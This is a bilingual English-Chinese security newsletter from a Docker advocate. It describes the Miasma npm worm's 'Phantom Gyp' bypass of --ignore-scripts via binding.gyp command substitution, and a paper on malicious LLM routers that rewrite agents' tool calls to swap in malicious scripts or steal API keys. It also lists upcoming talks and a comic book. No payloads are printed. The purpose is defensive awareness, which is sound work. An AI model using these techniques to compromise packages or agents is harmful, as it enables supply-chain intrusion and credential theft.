Docker Security Dispatch — Issue 4: Miasma, Phantom Gyp, and AI Routing 🪱️
Docker Security Dispatch — Issue 4: Miasma, Phantom Gyp, and AI Routing 🪱️
Docker 安全快报 — 第 4 期:Miasma、Phantom Gyp 与 AI 路由 🪱️
Welcome to the fourth issue of Docker Security Dispatch, written from the beautiful city of Bratislava, Slovakia. June has proven that the security battleground has shifted from the production server to the developer’s workstation, the CI/CD pipeline cache, and the AI agent’s execution context. Supply chain worms are evolving to bypass the most trusted industry defenses, and new research has exposed critical flaws in the AI routing layer. 欢迎阅读第四期《Docker 安全快报》,本期内容撰写于美丽的斯洛伐克首都布拉迪斯拉发。六月证明了安全战场已经从生产服务器转移到了开发者的工作站、CI/CD 流水线缓存以及 AI 代理的执行环境中。供应链蠕虫正在进化以绕过业界最受信任的防御机制,而最新的研究也揭示了 AI 路由层中存在的关键缺陷。
Key Takeaways
核心要点
- Miasma & Phantom Gyp: The latest wave of npm worms bypasses the
--ignore-scriptsdefense using nativebinding.gypcommand substitution. - Miasma 与 Phantom Gyp: 最新一波 npm 蠕虫利用原生的
binding.gyp命令替换,绕过了--ignore-scripts防御机制。 - Malicious AI Routers: Understanding the implications of the “Your Agent Is Mine” research, which reveals how third-party LLM APIs alter in-flight tool-calling requests.
- 恶意 AI 路由器: 理解“你的代理归我了”(Your Agent Is Mine)研究的含义,该研究揭示了第三方 LLM API 如何篡改传输中的工具调用请求。
- Agentic Remediation: New insights on safely scaling agentic AI in production environments.
- 代理式修复: 关于在生产环境中安全扩展代理式 AI 的新见解。
- Upcoming Events & Releases: Details on my upcoming WeAreDevelopers World Congress sessions, a new talk at BaselOne, and a special comic book announcement.
- 近期活动与发布: 关于我即将参加的 WeAreDevelopers 世界大会的会议详情、BaselOne 的新演讲以及一本特别漫画书的预告。
🪱 The Evolution of Worms: Miasma and Phantom Gyp
🪱 蠕虫的进化:Miasma 与 Phantom Gyp
If you need a refresher on worms, perhaps take a look at my talk notes from EnterJS 2026: Defense Against the Dark Arts: NPM Attack. Just as the community began remediating the fallout from the TanStack CI cache poisoning, a highly sophisticated descendant emerged. In early June, the Miasma worm debuted a terrifying evasion technique dubbed “Phantom Gyp”. 如果你需要复习一下关于蠕虫的知识,不妨看看我在 EnterJS 2026 上的演讲笔记:《黑魔法防御术:NPM 攻击》。就在社区开始修复 TanStack CI 缓存投毒事件的影响时,一个高度复杂的后继者出现了。六月初,Miasma 蠕虫首次展示了一种被称为“Phantom Gyp”的恐怖规避技术。
For years, the standard advice for preventing malicious package execution during installation has been to run npm install --ignore-scripts. Miasma renders this control entirely ineffective. The attackers embedded a tiny binding.gyp file inside the published tarballs. Because package managers must process native bindings via node-gyp before the C++ compiler is invoked, the malware uses command substitution to force the evaluation of an attacker-controlled shell payload during the configuration phase.
多年来,防止安装过程中恶意包执行的标准建议是运行 npm install --ignore-scripts。但 Miasma 让这一控制手段完全失效。攻击者在发布的压缩包中嵌入了一个微小的 binding.gyp 文件。由于包管理器必须在调用 C++ 编译器之前通过 node-gyp 处理原生绑定,恶意软件利用命令替换,在配置阶段强制执行攻击者控制的 shell 载荷。
I’ve put together a comprehensive analysis of the recent worm campaigns tearing through the ecosystem. You can read my full breakdown of the 6 worms here: Beyond SLSA: The Worms Are Here. Also, I gave Phantom Gyp a special treatment, “composing” music for it. 我已经对近期席卷生态系统的蠕虫活动进行了全面分析。你可以在此处阅读我对这 6 种蠕虫的完整剖析:《超越 SLSA:蠕虫来了》。此外,我还为 Phantom Gyp 做了特别处理,为它“创作”了一段音乐。
🤖 The AI Supply Chain & Production-Safe Remediation
🤖 AI 供应链与生产环境的安全修复
This month, I’m also poking my finger into academic research. This section is about a research paper titled “Your Agent Is Mine: Measuring Malicious Intermediary Attacks on the LLM Supply Chain” by Hanzhi Liu et al. from UC Santa Barbara. The paper explores the security implications of using third-party LLM APIs in production environments. 本月,我还涉足了学术研究领域。本节讨论的是一篇题为《你的代理归我了:衡量针对 LLM 供应链的恶意中间人攻击》的研究论文,作者是来自加州大学圣塔芭芭拉分校的 Hanzhi Liu 等人。该论文探讨了在生产环境中使用第三方 LLM API 的安全隐患。
LLM API routers are basically a part of the transport layer that sits between your code and the LLM. They are responsible for routing requests to the appropriate model, handling retries, and managing rate limits. However, these routers have plaintext access to in-flight JSON payloads, which means that, if compromised, they can silently rewrite an LLM’s output. A benign installation URL generated by an LLM can be swapped for a malicious script, or an API key can be seamlessly exfiltrated. LLM API 路由器本质上是位于你的代码和 LLM 之间的传输层的一部分。它们负责将请求路由到合适的模型、处理重试并管理速率限制。然而,这些路由器可以明文访问传输中的 JSON 载荷,这意味着如果它们被攻破,就可以静默地重写 LLM 的输出。LLM 生成的良性安装 URL 可能会被替换为恶意脚本,或者 API 密钥可能会被无缝窃取。
To safely utilize these tools, we must rethink how we deploy them. I recently co-authored a deep dive on this exact topic that was featured on the main page of DZone! Check it out here: Building Production-Safe Agentic Remediation With Docker MCP Gateway. 为了安全地使用这些工具,我们必须重新思考部署方式。我最近合著了一篇关于该主题的深度文章,并登上了 DZone 的首页!点击此处查看:《使用 Docker MCP 网关构建生产环境安全的代理式修复》。
🎙️ Recent Talks & Catch-Ups
🎙️ 近期演讲与回顾
If you missed my recent conference appearances, the write-ups and recordings are now available: 如果你错过了我最近的会议演讲,现在可以查看相关的总结和录像:
- EnterJS 2026: Defense Against the Dark Arts: NPM Attack
- JRush: I recently joined the JRush livestream for a great discussion on the current threat landscape. Watch the replay on YouTube here.
- JRush: 我最近参加了 JRush 的直播,就当前的威胁态势进行了深入探讨。点击此处在 YouTube 上观看回放。
📅 Upcoming Events: Berlin & Basel
📅 近期活动:柏林与巴塞尔
The conversation regarding advanced supply chain security will continue next month in Berlin at the WeAreDevelopers World Congress. I have a packed schedule, and I’d love to see you there: 关于高级供应链安全的讨论将于下个月在柏林的 WeAreDevelopers 世界大会上继续进行。我的日程安排很满,期待在那里见到你:
- July 8 (Pre-conference meetup): Agentic AI in the Wild: What Actually Runs in Production – I’m co-organizing this event alongside Dana Fine and Zaid Zaim.
- 7 月 8 日(会前聚会): 《野外代理式 AI:生产环境中到底运行着什么》——我将与 Dana Fine 和 Zaid Zaim 共同组织此次活动。
- July 9 (Conference workshop): Dockerize Java Securely: SBOMs + Attestations + Bake (Docker Commandos v1.6.3).
- 7 月 9 日(会议研讨会): 《安全地 Docker 化 Java:SBOM + 证明 + Bake》(Docker Commandos v1.6.3)。
- July 10 (Conference talk): Beyond SBOMs: The Future of Container Supply Chain Security.
- 7 月 10 日(会议演讲): 《超越 SBOM:容器供应链安全的未来》。
Looking further ahead: I am thrilled to announce that my talk has also been officially accepted at BaselOne! More details on the schedule for that will follow soon. 展望未来:我很高兴地宣布,我的演讲也已正式被 BaselOne 大会接收!更多关于该日程的详情将很快公布。
📚 Special Announcement: “Black Forest Commandos: Asgard Mission”
📚 特别预告:《黑森林突击队:阿斯加德任务》
Finally, I am incredibly excited to announce that my comic book, “Black Forest Commandos: Asgard Mission,” is officially coming out in September! This comic tells the story of the 10 Docker Commandos workshop series. It chronicles the exact narrative and technical challenges as they happened live during the workshops at WeAreDevelopers Berlin 2026, JCON Europe 2026, and Rabobank 2026. 最后,我非常激动地宣布,我的漫画书《黑森林突击队:阿斯加德任务》将于 9 月正式发布!这部漫画讲述了“10 个 Docker 突击队”系列研讨会的故事。它记录了在 WeAreDevelopers Berlin 2026、JCON Europe 2026 和 Rabobank 2026 研讨会现场发生的真实叙事和技术挑战。
The comic will be available in both print and digital formats. Stay tuned for pre-order information later this summer! Until then, keep your caches isolated, sandbox your AI agents, and verify your dependencies. 该漫画将提供印刷版和数字版。请留意今年夏天晚些时候发布的预购信息!在此之前,请保持缓存隔离,对 AI 代理进行沙箱处理,并验证你的依赖项。